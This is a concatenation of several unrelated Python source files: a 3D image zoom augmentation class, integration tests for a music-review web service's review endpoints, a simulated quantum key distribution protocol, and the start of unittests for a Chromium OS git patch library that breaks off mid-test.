    padded/cropped back to the original shape.
    """

    def __init__(self, scale_range=(0.9, 1.1), proba=0.3):
        """
        :param scale_range: interval the zoom factor is drawn from.
        :param proba: probability to apply the zoom to a given sample.
        """
        self.proba = proba
        self.scale_range = scale_range

    def draw_parameter_in_range(self, range=(0,1)):
        """Sample uniformly from *range*; a degenerate range returns its bound."""
        if range[0] == range[1]:
            param = range[0]
        else:
            param = np.random.uniform(range[0], range[1])
        return param

    def seg_to_one_hot(self, seg):
        """Convert a (1, x, y, z) label volume to a (num_classes, x, y, z) one-hot volume."""
        one_hot = np.eye(seg.max() + 1)[np.squeeze(seg)].astype(np.float32)
        one_hot = np.transpose(one_hot, (3, 0, 1, 2))
        return one_hot

    def proba_to_seg(self, seg_proba):
        """Collapse a (num_classes, x, y, z) score volume back to (1, x, y, z) labels."""
        seg = np.argmax(seg_proba, axis=0)
        seg = np.expand_dims(seg, axis=0)
        return seg

    def pad_if_needed(self, volume, target_shape):
        """Symmetrically zero-pad every dimension that is smaller than the target."""
        shape = volume.shape
        num_dim = len(shape)
        # BUGFIX: 'shape < target_shape' compared the tuples lexicographically
        # (a single bool), so a volume larger in an early dimension but smaller
        # in a later one was never padded. Compare element-wise instead.
        need_padding = np.any(np.array(shape) < np.array(target_shape))
        if not need_padding:
            return volume
        pad_list = []
        for dim in range(num_dim):
            diff = target_shape[dim] - shape[dim]
            if diff > 0:
                margin = diff // 2
                pad_list.append((margin, diff - margin))
            else:
                pad_list.append((0, 0))
        padded_array = np.pad(
            volume,
            pad_list,
            'constant',
            constant_values=[(0, 0)] * num_dim,
        )
        return padded_array

    def crop_if_needed(self, volume, target_shape):
        """Center-crop spatial dims larger than the target (channel dim untouched)."""
        shape = volume.shape
        # BUGFIX: element-wise comparison instead of lexicographic tuple
        # comparison (see pad_if_needed).
        need_cropping = np.any(np.array(shape) > np.array(target_shape))
        if not need_cropping:
            return volume
        crop_param = []
        for dim in range(3):
            # dim + 1 skips the channel dimension: only spatial dims are cropped.
            diff = shape[dim + 1] - target_shape[dim + 1]
            if diff > 0:
                margin = diff // 2
                crop_param.append([margin, shape[dim + 1] - (diff - margin)])
            else:
                crop_param.append([0, shape[dim + 1]])
        crop_param = np.array(crop_param)
        out = volume[:, crop_param[0, 0]:crop_param[0, 1],
                     crop_param[1, 0]:crop_param[1, 1],
                     crop_param[2, 0]:crop_param[2, 1]]
        return out

    def fix_shape(self, volume, target_shape):
        """Pad then crop so that *volume* ends up exactly at *target_shape*."""
        out = self.pad_if_needed(volume, target_shape)
        out = self.crop_if_needed(out, target_shape)
        return out

    def do_zoom(self, concat_img_and_seg_np):
        """Interpolate the stacked image+one-hot volume by a random scale factor."""
        scale = self.draw_parameter_in_range(self.scale_range)
        # Add batch dimension and convert to torch tensor
        input_torch = torch.from_numpy(
            np.expand_dims(concat_img_and_seg_np, axis=0)
        )
        if torch.cuda.is_available():
            input_torch = input_torch.cuda()
        out_torch = nn.functional.interpolate(
            input_torch,
            scale_factor=scale,
            mode='trilinear',
            align_corners=False,
        )
        out_np = out_torch.cpu().numpy()
        out_np = out_np[0, ...]
        return out_np

    def __call__(self, img, seg):
        """Zoom (img, seg) together with probability self.proba, else pass through."""
        if np.random.uniform() <= self.proba:
            shape = img.shape  # (n_chan, x_dim, y_dim, z_dim)
            # Convert the segmentation to one hot encoding
            one_hot = self.seg_to_one_hot(seg)
            concat = np.concatenate([img, one_hot], axis=0)
            # Apply the zoom
            zoom_concat = self.do_zoom(concat)
            zoom_img = zoom_concat[:shape[0], ...]
            zoom_one_hot = zoom_concat[shape[0]:, ...]
            zoom_seg = self.proba_to_seg(zoom_one_hot)
            # Crop or pad if needed
            zoom_img = self.fix_shape(zoom_img, shape)
            zoom_seg = self.fix_shape(zoom_seg, shape)
            zoom_img = np.copy(zoom_img, order='C').astype(np.float32)
            zoom_seg = np.copy(zoom_seg, order='C').astype(np.uint8)
        else:
            zoom_img = img
            zoom_seg = seg
        return zoom_img, zoom_seg
|
<filename>critiquebrainz/ws/review/test/views_test.py
import json
import uuid
from brainzutils import cache
import critiquebrainz.db.license as db_license
import critiquebrainz.db.review as db_review
import critiquebrainz.db.users as db_users
from critiquebrainz.db.user import User
from critiquebrainz.ws.testing import WebServiceTestCase
class ReviewViewsTestCase(WebServiceTestCase):
    """Integration tests for the /review/* web-service endpoints."""

    def setUp(self):
        """Create two users, a license, and a reusable template review payload."""
        super(ReviewViewsTestCase, self).setUp()
        self.user = User(db_users.get_or_create(1, "Tester", new_user_data={
            "display_name": "test user",
        }))
        self.another_user = User(db_users.get_or_create(2, "Hacker!", new_user_data={
            "display_name": "test hacker",
        }))
        self.license = db_license.create(
            id="CC BY-SA 3.0",
            full_name="Created so we can fill the form correctly.",
        )
        self.review = dict(
            entity_id="90878b63-f639-3c8b-aefb-190bdf3d1790",
            entity_type='release_group',
            user_id=self.user.id,
            text="Testing! This text should be on the page.",
            rating=5,
            is_draft=False,
            license_id=self.license["id"],
        )

    def header(self, user):
        """Build JSON request headers carrying *user*'s Bearer token."""
        data = {
            'Content-Type': 'application/json',
            'Authorization': "Bearer " + self.create_dummy_token(user)
        }
        return data

    def create_dummy_review(self):
        """Insert the template review from setUp into the database."""
        return db_review.create(**self.review)

    def test_review_sort(self):
        """Known `sort` values are accepted; anything else yields HTTP 400."""
        response = self.client.get('/review/', query_string={'sort': 'rating'})
        self.assert200(response)
        response = self.client.get('/review/', query_string={'sort': 'published_on'})
        self.assert200(response)
        response = self.client.get('/review/', query_string={'sort': 'popularity'})
        self.assert200(response)
        response = self.client.get('/review/', query_string={'sort': 'created'})
        self.assert200(response)
        response = self.client.get('/review/', query_string={'sort': 'hello'})
        self.assert400(response)
        self.assertEqual(response.json['description'], 'Parameter `sort`: is not valid')

    def test_review_sort_order(self):
        """Known `sort_order` values are accepted; anything else yields HTTP 400."""
        response = self.client.get('/review/', query_string={'sort_order': 'desc'})
        self.assert200(response)
        response = self.client.get('/review/', query_string={'sort_order': 'asc'})
        self.assert200(response)
        response = self.client.get('/review/', query_string={'sort_order': 'hello'})
        self.assert400(response)
        self.assertEqual(response.json['description'], 'Parameter `sort_order`: is not valid')

    def test_review_count(self):
        """An empty database reports a review count of zero."""
        resp = self.client.get('/review/').json
        self.assertEqual(resp['count'], 0)

    def test_review_entity(self):
        """A single review can be fetched by its id."""
        review = self.create_dummy_review()
        resp = self.client.get('/review/%s' % review["id"]).json
        self.assertEqual(resp['review']['id'], str(review["id"]))

    def test_review_delete(self):
        """The author can delete their own review."""
        review = self.create_dummy_review()
        resp = self.client.delete('/review/%s' % review["id"], headers=self.header(self.user))
        self.assert200(resp)

    def test_review_type(self):
        """`review_type` filters between text reviews and rating-only reviews."""
        # Review with both text and rating -- matches both filter values.
        review_type_all = db_review.create(
            entity_id="1b3abc15-7453-39f3-86c4-1441f360e121",
            entity_type='release_group',
            user_id=self.user.id,
            text="Testing! This text should be on the page.",
            rating=5,
            is_draft=False,
            license_id=self.license["id"],
        )
        review_only_rating = db_review.create(
            entity_id="2b3abc25-7453-39f3-86c4-1441f360e121",
            entity_type='release_group',
            user_id=self.user.id,
            rating=5,
            is_draft=False,
            license_id=self.license["id"],
        )
        review_only_review = db_review.create(
            entity_id="3b3abc35-7453-39f3-86c4-1441f360e121",
            entity_type='release_group',
            user_id=self.user.id,
            text="Testing! This text should be on the page.",
            is_draft=False,
            license_id=self.license["id"],
        )
        response = self.client.get('/review/', query_string={'review_type': 'rating'})
        self.assert200(response)
        actual_review_ids = [review['id'] for review in response.json['reviews']]
        expected_review_ids = [str(review_type_all['id']), str(review_only_rating['id'])]
        self.assertCountEqual(actual_review_ids, expected_review_ids)
        response = self.client.get('/review/', query_string={'review_type': 'review'})
        self.assert200(response)
        actual_review_ids = [review['id'] for review in response.json['reviews']]
        expected_review_ids = [str(review_type_all['id']), str(review_only_review['id'])]
        self.assertCountEqual(actual_review_ids, expected_review_ids)

    def test_review_large_count(self):
        """Test that retrieving reviews of a particular type correctly returns the total number of
        reviews of this type in addition to the paged results"""
        # 100 text reviews and 1 rating
        for _ in range(100):
            review = dict(
                entity_id=uuid.uuid4(),
                entity_type='release_group',
                user_id=self.user.id,
                text="Testing! This text should be on the page.",
                is_draft=False,
                license_id=self.license["id"],
            )
            db_review.create(**review)
        db_review.create(
            entity_id="2b3abc25-7453-39f3-86c4-1441f360e121",
            entity_type='release_group',
            user_id=self.user.id,
            rating=5,
            is_draft=False,
            license_id=self.license["id"],
        )
        resp = self.client.get('/review/')
        self.assert200(resp)
        self.assertEqual(resp.json["count"], 101)
        resp = self.client.get('/review/', query_string={'review_type': 'review'})
        self.assert200(resp)
        # "count" covers every matching review; the page itself is capped at 50.
        self.assertEqual(resp.json["count"], 100)
        self.assertEqual(len(resp.json["reviews"]), 50)

    def test_review_modify(self):
        """Only the author may edit; a no-op edit creates no new revision."""
        review = self.create_dummy_review()
        resp = self.client.post('/review/%s' % review["id"], headers=self.header(self.another_user))
        self.assert403(resp, "Shouldn't be able to edit someone else's review.")
        # Check that a new revision is not created when review contents are not edited
        data = dict()
        resp = self.client.post('/review/%s' % review["id"], headers=self.header(self.user), data=json.dumps(data))
        self.assert200(resp)
        resp = self.client.get('/review/%s/revisions' % review["id"]).json
        self.assertEqual(len(resp['revisions']), 1)
        # Check if the passed parameter is modified and the other is not
        data = dict(text="Some updated text with length more than twenty five.")
        resp = self.client.post('/review/%s' % review["id"], headers=self.header(self.user), data=json.dumps(data))
        self.assert200(resp)
        resp = self.client.get('/review/%s' % review["id"]).json
        self.assertEqual(resp['review']['text'], data['text'])
        self.assertEqual(resp['review']['rating'], review['rating'])

    def test_review_list(self):
        """Listing returns the single stored review."""
        review = self.create_dummy_review()
        resp = self.client.get('/review/').json
        self.assertEqual(resp['count'], 1)
        self.assertEqual(len(resp['reviews']), 1)
        self.assertEqual(resp['reviews'][0]['id'], str(review['id']))
        # TODO(roman): Completely verify output (I encountered unicode issues when tried to do that).

    def test_review_post(self):
        """Posting a review requires text and/or rating; plain text works."""
        review = dict(
            entity_id=self.review['entity_id'],
            entity_type='release_group',
            text=self.review['text'],
            rating=str(self.review['rating']),
            license_choice=self.license["id"],
            language='en',
            is_draft=True
        )
        resp = self.client.post('/review/', headers=self.header(self.user), data=json.dumps(review))
        self.assert200(resp)
        # Neither text nor rating -- must be rejected.
        review_2 = dict(
            entity_id=self.review['entity_id'],
            entity_type='release_group',
            license_choice=self.license["id"],
            language='en',
            is_draft=True
        )
        resp = self.client.post('/review/', headers=self.header(self.another_user), data=json.dumps(review_2))
        self.assert400(resp, "Review must have either text or rating")
        # test writing a normal review works using the API. this test may not look useful but interestingly,
        # writing a review using the API was broken for at least a year and no one seemed to notice or report
        # it. so here it is, a test to write a valid review using the API.
        review_3 = dict(
            entity_id=self.review['entity_id'],
            entity_type='release_group',
            license_choice=self.license["id"],
            language='en',
            text="Hello, World! Let's write a long long long even longer the longest review........................"
        )
        resp = self.client.post('/review/', headers=self.header(self.another_user), data=json.dumps(review_3))
        self.assert200(resp)

    def test_review_vote_entity(self):
        """GET on a review's vote endpoint 404s when the user has not voted."""
        review = self.create_dummy_review()
        resp = self.client.get('/review/%s/vote' % review["id"], headers=self.header(self.user))
        self.assert404(resp)

    def test_review_vote_put(self):
        """Voting rules: no self-votes and no votes on rating-only reviews."""
        review = self.create_dummy_review()
        resp = self.client.put(
            '/review/%s/vote' % review["id"],
            headers=self.header(self.user),
            data=json.dumps({"vote": True})
        )
        self.assertEqual(resp.json['description'], 'You cannot rate your own review.')
        resp = self.client.put(
            '/review/%s/vote' % review["id"],
            headers=self.header(self.another_user),
            data=json.dumps({"vote": True})
        )
        self.assert200(resp)
        resp = self.client.put(
            '/review/%s/vote' % review["id"],
            headers=self.header(self.another_user),
            data=json.dumps({"vote": False})
        )
        self.assert200(resp)
        # Update to review to only-rating type
        db_review.update(
            review_id=review["id"],
            drafted=review["is_draft"],
            rating=5,
            is_draft=False,
        )
        resp = self.client.put(
            '/review/%s/vote' % review["id"],
            headers=self.header(self.another_user),
            data=json.dumps({"vote": True})
        )
        self.assert400(resp, "Voting on reviews without text is not allowed.")

    def test_review_vote_delete(self):
        """A vote can be deleted only after it has been cast."""
        review = self.create_dummy_review()
        resp = self.client.delete('/review/%s/vote' % review["id"], headers=self.header(self.another_user))
        self.assert400(resp)
        vote = dict(vote=True)
        self.client.put('/review/%s/vote' % review["id"], headers=self.header(self.another_user), data=json.dumps(vote))
        resp = self.client.delete('/review/%s/vote' % review["id"], headers=self.header(self.another_user))
        self.assert200(resp)

    def test_revision_entity_handler(self):
        """Each edit creates a new numbered revision that can be fetched."""
        review = self.create_dummy_review()
        resp = self.client.get('/review/%s/revisions/1' % review["id"])
        self.assert200(resp)
        data = dict(text="This is an updated review")
        self.client.post('/review/%s' % review["id"], headers=self.header(self.user), data=json.dumps(data))
        resp = self.client.get('/review/%s/revisions/2' % review["id"])
        self.assert200(resp)

    def test_cache_tracking(self):
        """Cache keys are tracked per entity and invalidated on review creation."""
        entity_id = self.review["entity_id"]
        track_key = cache.gen_key("ws_cache", entity_id)
        # Test no cache if entity id is not provided
        self.client.get('/review/', query_string={'sort': 'rating'})
        cache_keys = cache.smembers(track_key, namespace="Review")
        self.assertEqual(set(), cache_keys)
        expected_cache_keys = {'list_entity_id=90878b63-f639-3c8b-aefb-190bdf3d1790_user_id=None_sort=popularity_sort_order=desc_entity_type=None_limit=50_offset=0_language=None_review_type=None',
                               'list_entity_id=90878b63-f639-3c8b-aefb-190bdf3d1790_user_id=None_sort=published_on_sort_order=desc_entity_type=None_limit=5_offset=0_language=None_review_type=None'}
        # Test cache keys are recorded
        self.client.get('/review/', query_string={'sort': 'rating', 'entity_id': entity_id})
        self.client.get('/review/', query_string={'limit': 5, 'entity_id': entity_id})
        cache_keys = cache.smembers(track_key, namespace="Review")
        self.assertEqual(expected_cache_keys, cache_keys)
        # Test no cache changes if entity_id is not available
        self.client.get('/review/', query_string={'limit': 5})
        cache_keys = cache.smembers(track_key, namespace="Review")
        self.assertEqual(expected_cache_keys, cache_keys)
        no_entity_id_key = cache.gen_key("ws_cache", None)
        self.assertEqual(set(), cache.smembers(no_entity_id_key, namespace="Review"))
        # Test cache invalidation upon review creation
        db_review.create(**self.review)
        cache_keys = cache.smembers(track_key, namespace="Review")
        self.assertEqual(set(), cache_keys)
|
<reponame>stephendiadamo/qkd_error_recon
import netsquid as ns
import numpy as np
from netsquid.components import QuantumProgram, SourceStatus
from netsquid.protocols import NodeProtocol, Signals
from qkd.networks import TwoPartyNetwork
class KeyReceiverProtocol(NodeProtocol):
    """
    Protocol for the receiver of the key.
    """

    def __init__(self, node, key_size=10, port_names=("qubitIO", "classicIO")):
        """
        :param node: network node this protocol runs on.
        :param key_size: number of qubits expected from the sender.
        :param port_names: (quantum port, classical port) names on the node.
        """
        super().__init__(node)
        self.node = node
        self.q_port = port_names[0]
        self.c_port = port_names[1]
        self.key_size = key_size
        # Filled with the sifted key once the protocol finishes.
        self.key = None

    def run(self):
        # Select random bases
        bases = np.random.randint(2, size=self.key_size)
        results = []
        qubits_received = 0

        def record_measurement(msg):
            # Detector click callback: store the measured classical bit.
            results.append(msg.items[0])

        def measure_qubit(message):
            # Route each arriving qubit to the Z or X detector according to
            # the pre-drawn basis for this position.
            nonlocal qubits_received
            if bases[qubits_received] == 0:
                self.node.qmemory.subcomponents['qubit_detector_z'].ports['qin0'].tx_input(message)
            else:
                self.node.qmemory.subcomponents['qubit_detector_x'].ports['qin0'].tx_input(message)
            qubits_received += 1

        # Wire the handlers before any qubit can arrive.
        self.node.ports[self.q_port].bind_input_handler(measure_qubit)
        self.node.qmemory.subcomponents['qubit_detector_z'].ports['cout0'].bind_output_handler(record_measurement)
        self.node.qmemory.subcomponents['qubit_detector_x'].ports['cout0'].bind_output_handler(record_measurement)
        # Await done signal from Alice
        yield self.await_port_input(self.node.ports[self.c_port])
        # All qubits sent, send bases back
        self.node.ports[self.c_port].tx_output(bases[:len(results)])
        # Await matched indices from Alice and process key
        yield self.await_port_input(self.node.ports[self.c_port])
        matched_indices = self.node.ports[self.c_port].rx_input().items
        final_key = []
        for i in matched_indices:
            # Guard against indices beyond what was actually detected
            # (e.g. lost qubits).
            if i < len(results):
                final_key.append(results[i])
        self.key = final_key
        self.send_signal(signal_label=Signals.SUCCESS, result=final_key)
class KeySenderProtocol(NodeProtocol):
    """
    Protocol for the sender of the key.
    """

    def __init__(self, node, key_size=10, port_names=("qubitIO", "classicIO")):
        """
        :param node: network node this protocol runs on.
        :param key_size: number of entangled pairs to generate.
        :param port_names: (quantum port, classical port) names on the node.
        """
        super().__init__(node)
        self.node = node
        self.q_port = port_names[0]
        self.c_port = port_names[1]
        self.key_size = key_size
        # Filled with the sifted key once the protocol finishes.
        self.key = None

    def run(self):
        bases = list(np.random.randint(2, size=self.key_size))
        bit = 0
        results = []
        # Transmit encoded qubits to Bob

        def record_measurement(msg):
            # Detector click callback: store the measured classical bit.
            results.append(msg.items[0])

        def measure_half(message):
            # Measure the locally kept half of each entangled pair in the
            # pre-drawn basis for this position.
            nonlocal bit
            if bases[bit] == 0:
                self.node.qmemory.subcomponents['qubit_detector_z'].ports['qin0'].tx_input(message)
            else:
                self.node.qmemory.subcomponents['qubit_detector_x'].ports['qin0'].tx_input(message)
            bit += 1

        # Wire the handlers before starting the entanglement source.
        self.node.qmemory.subcomponents['ent_source'].ports['qout0'].bind_output_handler(measure_half)
        self.node.qmemory.subcomponents['qubit_detector_z'].ports['cout0'].bind_output_handler(record_measurement)
        self.node.qmemory.subcomponents['qubit_detector_x'].ports['cout0'].bind_output_handler(record_measurement)
        # Turn the source on; qout0 halves are measured locally (handler
        # above), qout1 halves are forwarded to the receiver one by one.
        self.node.qmemory.subcomponents['ent_source'].status = SourceStatus.INTERNAL
        for i in range(self.key_size):
            yield self.await_port_output(self.node.qmemory.subcomponents['ent_source'].ports['qout1'])
            self.node.ports[self.q_port].tx_output(
                self.node.qmemory.subcomponents['ent_source'].ports['qout1'].rx_output())
        self.node.qmemory.subcomponents['ent_source'].status = SourceStatus.OFF
        self.node.ports[self.c_port].tx_output('DONE')
        # Await response from Bob
        yield self.await_port_input(self.node.ports[self.c_port])
        bob_bases = self.node.ports[self.c_port].rx_input().items[0]
        matched_indices = []
        for i in range(len(bob_bases)):
            # Sift: keep only positions where both parties chose the same basis.
            if bob_bases[i] == bases[i]:
                matched_indices.append(i)
        self.node.ports[self.c_port].tx_output(matched_indices)
        final_key = []
        for i in matched_indices:
            final_key.append(results[i])
        self.key = final_key
        self.send_signal(signal_label=Signals.SUCCESS, result=final_key)
if __name__ == '__main__':
    # Demo entry point: run the entanglement-based key exchange between two
    # nodes of a simulated noisy network.
    # NOTE(review): assumes TwoPartyNetwork's positional args and t_time/loss
    # semantics (T1/T2 decoherence, lossless channel) -- confirm against
    # qkd.networks.TwoPartyNetwork before relying on these values.
    n = TwoPartyNetwork('net', 0, 0, 10, t_time={'T1': 110, 'T2': 100}, loss=(0, 0)).generate_noisy_network()
    node_a = n.get_node("alice")
    node_b = n.get_node("bob")
    p1 = KeySenderProtocol(node_a, key_size=100)
    p2 = KeyReceiverProtocol(node_b, key_size=100)
    p1.start()
    p2.start()
    # ns.logger.setLevel(4)
    stats = ns.sim_run()
    # After the simulation both parties should hold identical sifted keys.
    print(len(p1.key))
    print(p1.key)
    print(p2.key)
|
#!/usr/bin/python
# Copyright (c) 2012 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Unittests for chromite.lib.patch."""
import copy
import itertools
import os
import shutil
import sys
import time
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.dirname(
os.path.abspath(__file__)))))
from chromite.cbuildbot import constants
from chromite.lib import cros_build_lib
from chromite.lib import cros_build_lib_unittest
from chromite.lib import cros_test_lib
from chromite.lib import gerrit
from chromite.lib import git
from chromite.lib import osutils
from chromite.lib import patch as cros_patch
import mock
# Python 2 idiom: bound .next method of an endless counter; each call yields
# the next unique integer (used to generate distinct values in tests).
_GetNumber = iter(itertools.count()).next
# Canned Gerrit query result used as a fake patch payload in the tests below.
FAKE_PATCH_JSON = {
    "project":"tacos/chromite", "branch":"master",
    "id":"Iee5c89d929f1850d7d4e1a4ff5f21adda800025f",
    "currentPatchSet": {
        "number":"2", "ref":gerrit.GetChangeRef(1112, 2),
        "revision":"ff10979dd360e75ff21f5cf53b7f8647578785ef",
    },
    "number":"1112",
    "subject":"chromite commit",
    "owner":{"name":"Chromite Master", "email":"<EMAIL>"},
    "url":"https://chromium-review.googlesource.com/1112",
    "lastUpdated":1311024529,
    "sortKey":"00166e8700001052",
    "open": True,
    "status":"NEW",
}
# Change-ID of a known open change in public gerrit.
GERRIT_OPEN_CHANGEID = '8366'
# Change-IDs of known merged / abandoned changes in public gerrit.
GERRIT_MERGED_CHANGEID = '3'
GERRIT_ABANDONED_CHANGEID = '2'
class GitRepoPatchTestCase(cros_test_lib.TempDirTestCase):
    """Helper TestCase class for writing test cases."""
    # No mock bits are to be used in this class's tests.
    # This needs to actually validate git output, and git behaviour, rather
    # than test our assumptions about git's behaviour/output.
    patch_kls = cros_patch.GitRepoPatch
    # Commit-message template; %(extra)s and %(change-id)s are substituted by
    # CommitChangeIdFile. This is a runtime format string.
    COMMIT_TEMPLATE = (
"""commit abcdefgh
Author: Fake person
Date:  Tue Oct 99
I am the first commit.
%(extra)s
%(change-id)s
"""
    )
    # Boolean controlling whether the target class natively knows its
    # ChangeId; only GerritPatches do.
    has_native_change_id = False
    DEFAULT_TRACKING = 'refs/remotes/%s/master' % constants.EXTERNAL_REMOTE

    def _CreateSourceRepo(self, path):
        """Generate a new repo with a single commit."""
        tmp_path = '%s-tmp' % path
        os.mkdir(path)
        os.mkdir(tmp_path)
        self._run(['git', 'init', '--separate-git-dir', path], cwd=tmp_path)
        # Add an initial commit then wipe the working tree.
        self._run(['git', 'commit', '--allow-empty', '-m', 'initial commit'],
                  cwd=tmp_path)
        shutil.rmtree(tmp_path)

    def setUp(self):
        """Create a source repo and chdir into an unwritable directory."""
        # Create an empty repo to work from.
        self.source = os.path.join(self.tempdir, 'source.git')
        self._CreateSourceRepo(self.source)
        self.default_cwd = os.path.join(self.tempdir, 'unwritable')
        self.original_cwd = os.getcwd()
        os.mkdir(self.default_cwd)
        os.chdir(self.default_cwd)
        # Disallow write so as to smoke out any invalid writes to
        # cwd.
        os.chmod(self.default_cwd, 0o500)

    def tearDown(self):
        """Restore the working directory changed by setUp."""
        if hasattr(self, 'original_cwd'):
            os.chdir(self.original_cwd)

    def _MkPatch(self, source, sha1, ref='refs/heads/master', **kwargs):
        """Construct a patch_kls instance pointing at *sha1* in *source*."""
        return self.patch_kls(source, 'chromiumos/chromite', ref,
                              '%s/master' % constants.EXTERNAL_REMOTE,
                              kwargs.pop('remote', constants.EXTERNAL_REMOTE),
                              sha1=sha1, **kwargs)

    def _run(self, cmd, cwd=None):
        """Run *cmd* (defaulting to the unwritable cwd); return stripped stdout."""
        # Note that cwd is intentionally set to a location the user can't write
        # to; this flushes out any bad usage in the tests that would work by
        # fluke of being invoked from w/in a git repo.
        if cwd is None:
            cwd = self.default_cwd
        return cros_build_lib.RunCommand(
            cmd, cwd=cwd, print_cmd=False, capture_output=True).output.strip()

    def _GetSha1(self, cwd, refspec):
        """Resolve *refspec* to its commit sha1 in the repo at *cwd*."""
        return self._run(['git', 'rev-list', '-n1', refspec], cwd=cwd)

    def _MakeRepo(self, name, clone, remote=None, alternates=True):
        """Clone *clone* into tempdir/*name*, optionally using git alternates."""
        path = os.path.join(self.tempdir, name)
        cmd = ['git', 'clone', clone, path]
        if alternates:
            cmd += ['--reference', clone]
        if remote is None:
            remote = constants.EXTERNAL_REMOTE
        cmd += ['--origin', remote]
        self._run(cmd)
        return path

    def _MakeCommit(self, repo, commit=None):
        """Commit all pending changes in *repo*; return the new commit's sha1."""
        if commit is None:
            commit = "commit at %s" % (time.time(),)
        self._run(['git', 'commit', '-a', '-m', commit], repo)
        return self._GetSha1(repo, 'HEAD')

    def CommitFile(self, repo, filename, content, commit=None, **kwargs):
        """Write *content* to *filename*, commit it, and return a patch object."""
        osutils.WriteFile(os.path.join(repo, filename), content)
        self._run(['git', 'add', filename], repo)
        sha1 = self._MakeCommit(repo, commit=commit)
        if not self.has_native_change_id:
            kwargs.pop('ChangeId', None)
        patch = self._MkPatch(repo, sha1, **kwargs)
        self.assertEqual(patch.sha1, sha1)
        return patch

    def _CommonGitSetup(self):
        """Clone two repos from source and land one commit in the first."""
        git1 = self._MakeRepo('git1', self.source)
        git2 = self._MakeRepo('git2', self.source)
        patch = self.CommitFile(git1, 'monkeys', 'foon')
        return git1, git2, patch

    def MakeChangeId(self, how_many=1):
        """Return one ChangeId, or a list of them when how_many > 1."""
        l = [cros_patch.MakeChangeId() for _ in xrange(how_many)]
        if how_many == 1:
            return l[0]
        return l

    def CommitChangeIdFile(self, repo, changeid=None, extra=None,
                           filename='monkeys', content='flinging',
                           raw_changeid_text=None, **kwargs):
        """Commit a file whose commit message carries a (possibly raw) Change-Id."""
        template = self.COMMIT_TEMPLATE
        if changeid is None:
            changeid = self.MakeChangeId()
        if raw_changeid_text is None:
            raw_changeid_text = 'Change-Id: %s' % (changeid,)
        if extra is None:
            extra = ''
        commit = template % {'change-id': raw_changeid_text, 'extra':extra}
        return self.CommitFile(repo, filename, content, commit=commit,
                               ChangeId=changeid, **kwargs)
class TestGitRepoPatch(GitRepoPatchTestCase):
  """Unittests for git patch related methods."""

  def testGetDiffStatus(self):
    """Verify GetDiffStatus reports A/M/D status per touched file."""
    git1, _, patch1 = self._CommonGitSetup()
    # Ensure that it can work on the first commit, even if it
    # doesn't report anything (no delta; it's the first files).
    patch1 = self._MkPatch(git1, self._GetSha1(git1, self.DEFAULT_TRACKING))
    self.assertEqual({}, patch1.GetDiffStatus(git1))
    patch2 = self.CommitFile(git1, 'monkeys', 'blah')
    self.assertEqual({'monkeys': 'M'}, patch2.GetDiffStatus(git1))
    git.RunGit(git1, ['mv', 'monkeys', 'monkeys2'])
    patch3 = self._MkPatch(git1, self._MakeCommit(git1, commit="mv"))
    # A rename shows up as a delete of the old path plus an add.
    self.assertEqual({'monkeys': 'D', 'monkeys2': 'A'},
                     patch3.GetDiffStatus(git1))
    patch4 = self.CommitFile(git1, 'monkey2', 'blah')
    self.assertEqual({'monkey2': 'A'}, patch4.GetDiffStatus(git1))

  def testFetch(self):
    """Verify Fetch retrieves the rev and reuses local alternates."""
    _, git2, patch = self._CommonGitSetup()
    patch.Fetch(git2)
    self.assertEqual(patch.sha1, self._GetSha1(git2, 'FETCH_HEAD'))
    # Verify reuse; specifically that Fetch doesn't actually run since
    # the rev is already available locally via alternates.
    patch.project_url = '/dev/null'
    git3 = self._MakeRepo('git3', git2)
    patch.Fetch(git3)
    self.assertEqual(patch.sha1, self._GetSha1(git3, patch.sha1))

  def testFetchFirstPatchInSeries(self):
    """Fetching an older patch in a series must still succeed."""
    git1, git2, patch = self._CommonGitSetup()
    self.CommitFile(git1, 'monkeys', 'foon2')
    patch.Fetch(git2)

  def testFetchWithoutSha1(self):
    """Fetch must fill in a missing sha1 from the fetched rev."""
    git1, git2, _ = self._CommonGitSetup()
    patch2 = self.CommitFile(git1, 'monkeys', 'foon2')
    sha1, patch2.sha1 = patch2.sha1, None
    patch2.Fetch(git2)
    self.assertEqual(sha1, patch2.sha1)

  def testAlreadyApplied(self):
    """Applying an already-present patch raises PatchAlreadyApplied."""
    git1 = self._MakeRepo('git1', self.source)
    patch1 = self._MkPatch(git1, self._GetSha1(git1, 'HEAD'))
    self.assertRaises2(cros_patch.PatchAlreadyApplied, patch1.Apply, git1,
                       self.DEFAULT_TRACKING, check_attrs={'inflight':False})
    patch2 = self.CommitFile(git1, 'monkeys', 'rule')
    self.assertRaises2(cros_patch.PatchAlreadyApplied, patch2.Apply, git1,
                       self.DEFAULT_TRACKING, check_attrs={'inflight':True})

  def testDeleteEbuildTwice(self):
    """Test that double-deletes of ebuilds are flagged as conflicts."""
    # Create monkeys.ebuild for testing.
    git1 = self._MakeRepo('git1', self.source)
    patch1 = self.CommitFile(git1, 'monkeys.ebuild', 'rule')
    git.RunGit(git1, ['rm', 'monkeys.ebuild'])
    patch2 = self._MkPatch(git1, self._MakeCommit(git1, commit='rm'))

    # Delete an ebuild that does not exist in TOT.
    check_attrs = {'inflight': False, 'files': ('monkeys.ebuild',)}
    self.assertRaises2(cros_patch.EbuildConflict, patch2.Apply, git1,
                       self.DEFAULT_TRACKING, check_attrs=check_attrs)

    # Delete an ebuild that exists in TOT, but does not exist in the current
    # patch series.
    check_attrs['inflight'] = True
    self.assertRaises2(cros_patch.EbuildConflict, patch2.Apply, git1,
                       patch1.sha1, check_attrs=check_attrs)

  def testCleanlyApply(self):
    """Apply lands the patch on HEAD and reuses alternates on re-apply."""
    _, git2, patch = self._CommonGitSetup()
    # Clone git3 before we modify git2; else we'll just wind up
    # cloning it's master.
    git3 = self._MakeRepo('git3', git2)
    patch.Apply(git2, self.DEFAULT_TRACKING)
    self.assertEqual(patch.sha1, self._GetSha1(git2, 'HEAD'))
    # Verify reuse; specifically that Fetch doesn't actually run since
    # the object is available in alternates.  testFetch partially
    # validates this; the Apply usage here fully validates it via
    # ensuring that the attempted Apply goes boom if it can't get the
    # required sha1.
    patch.project_url = '/dev/null'
    patch.Apply(git3, self.DEFAULT_TRACKING)
    self.assertEqual(patch.sha1, self._GetSha1(git3, 'HEAD'))

  def testFailsApply(self):
    """A conflicting inflight patch raises ApplyPatchException."""
    _, git2, patch1 = self._CommonGitSetup()
    patch2 = self.CommitFile(git2, 'monkeys', 'not foon')
